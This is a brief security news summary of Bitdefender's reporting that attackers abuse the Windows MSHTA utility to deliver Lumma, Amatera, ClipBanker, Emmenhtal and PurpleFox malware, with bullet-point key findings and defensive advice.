MSHTA, a long-standing Windows component, is increasingly being abused by threat actors as a living-off-the-land binary to quietly deliver malware through social engineering and remote script execution. Bitdefender observed campaigns using MSHTA to spread Lumma, Amatera, ClipBanker, Emmenhtal, and PurpleFox, showing that legacy trust mechanisms remain highly effective for attackers. #MSHTA #Lumma #Amatera #ClipBanker #Emmenhtal #PurpleFox
Keypoints
- MSHTA is a Microsoft-signed Windows utility that can execute HTA files and remote script content.
- Threat actors are abusing MSHTA as a LOLBIN to deliver malware without raising suspicion.
- Bitdefender saw a sharp rise in MSHTA-related activity since the start of the year.
- Campaigns using MSHTA have delivered Lumma, Amatera, ClipBanker, Emmenhtal, and PurpleFox.
- User awareness and blocking legacy binaries like MSHTA are key defenses against these attacks.
Read More: https://www.securityweek.com/legacy-windows-tool-mshta-fuels-surge-in-silent-malware-attacks/